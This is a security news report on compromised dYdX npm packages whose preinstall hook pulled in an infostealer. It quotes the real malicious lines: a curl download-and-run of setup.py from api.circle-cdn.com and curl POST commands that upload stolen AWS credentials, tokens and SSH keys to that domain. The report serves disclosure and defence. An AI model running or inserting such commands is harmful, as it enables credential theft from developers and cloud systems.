Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised.
Powered by the Ethereum blockchain, dydX is a decentralized exchange platform offering perpetual trading options for over 35 popular cryptocurrencies including Bitcoin (BTC) and Ether (ETH). At the time of writing, we observed the platform’s average daily trading volume was touching $1 billion.
The packages in question were published from the npm account of a dYdX staff member and found to contain illicit code running info stealers on a system where these are installed.
npm packages used by crypto exchange compromised
Security researcher Maciej Mensfeld of software supply chain security firm Mend and creator of Diffend.io, reported coming across multiple npm packages that were compromised and covertly installing infostealers.
The packages in question, shown below, appear to have been published from the npm account of a dYdX crypto platform employee, BleepingComputer observed, although the cause of this compromise is yet to be confirmed:
@dydxprotocol/solo – version 0.41.1, 0.41.2
@dydxprotocol/perpetual – versions 1.2.2, 1.2.3
An earlier advisory claimed that the package ‘@dydxprotocol/node-service-base-dev’ was also affected but it has since been withdrawn.
BleepingComputer observed the compromised version 0.41.1 of ‘solo’ package was still live on npm at the time of writing:
These packages make up the “Ethereum Smart Contracts and TypeScript library used for the dYdX Solo Trading Protocol.”
The solo package, for example, is used by at least 44 GitHub repositories belonging to multiple crypto platforms. Both the ‘solo’ and ‘perpetual’ packages on GitHub state these are being “currently used by trade.dydx.exchange.”
Fake ‘Circle’ CDN domain used to steal AWS IAM creds, SSH keys, GitHub tokens
Mensfeld shared the problematic piece of code injected in the manifest file of ‘solo’ package, for example.
As soon as the ‘solo’ package is installed, a preinstall script would trigger, downloading and running the contents of the ci.js JavaScript file hosted on api.circle-cdn.com.
Public domain records seen by BleepingComputer state “circle-cdn.com” was registered quite recently—on September 14th.
The domain name and the use of ‘ci.js’ in the malicious file name are likely attempts by the threat actor to imitate CircleCI, a software development CI/CD (continuous integration and continuous delivery) platform. By contrast, CircleCI’s official API is hosted by Cloudflare and reachable on circleci.com/api/v2/pipeline.
“Looking at the diff here… a preinstall was added,” Mensfeld wrote in a GitHub issue alerting the dYdX community after having no luck reaching the platform.
“But this script contains a code that looks malicious…. It seems to be stealing credentials and other secrets,” explained the researcher.
BleepingComputer observed that the ci.js script pulled by the compromised versions, as shown below, downloads and runs yet another Python script, setup.py
curl http://api.circle-cdn.com/setup.py –output cisetup.py >> /dev/null 2>&1 && python3 cisetup.py && rm cisetup.py
It is this ‘setup.py’ with the info-stealing code that exfiltrates the IAM credentials from victim’s Amazon AWS instance, among other secrets.
The 169.254.x.x IP address shown below, which the malicious code connects to is the result of a concept called Automatic Private IP Addressing (APIPA), which is invoked when the computer configured to obtain an automatic IP address via DHCP is unable to do so from a DHCP server.
Docs published by Amazon AWS also show how this IP is relevant in the wider IAM context.
Additionally, the code steals the user’s GitHub tokens, SSH keys, environment variables, as well as the external IP address.
The stolen data is then uploaded to the same api.circle-cdn.com domain:
subprocess.getoutput(“curl -X POST http://api.circle-cdn.com/uploader.php -F ‘uploaded_file=@” + filename2 + “‘ -F ‘submit=Upload'”)
subprocess.getoutput(‘curl -X POST http://api.circle-cdn.com/api.php -d “textdata=’ + allen + ‘”‘)
BleepingComputer observed the malicious code is strikingly identical to that seen in the past, involving the malicious ‘PyGrata’ Python packages that also stole the victim’s AWS credentials, environment variables, and SSH keys.
dYdX chief architect Brendan Chou thanked Mensfeld for promptly reporting the compromise and confirmed that “all [compromised versions] have been taken down except solo@0.41.1,” attributing this to what appears to be “a temporary oversight” on npm’s part.
BleepingComputer has reached out to dYdX via email and Twitter prior to publishing, to better understand the impact and scope of this compromise and we’ll update this report as we hear back.
This incident follows last year’s hijack of popular npm libraries ‘ua-parser-js,’ ‘coa’ and ‘rc’ which were laced with crypto miners and password stealers. That too, just weeks after PyPI packages were hijacked as the result of a phishing campaign targeting developers.
Threats to the software supply chain like these in recent times have prompted leading open source registries like npm and PyPI to mandate two-factor authentication for maintainers responsible for most widely used libraries.
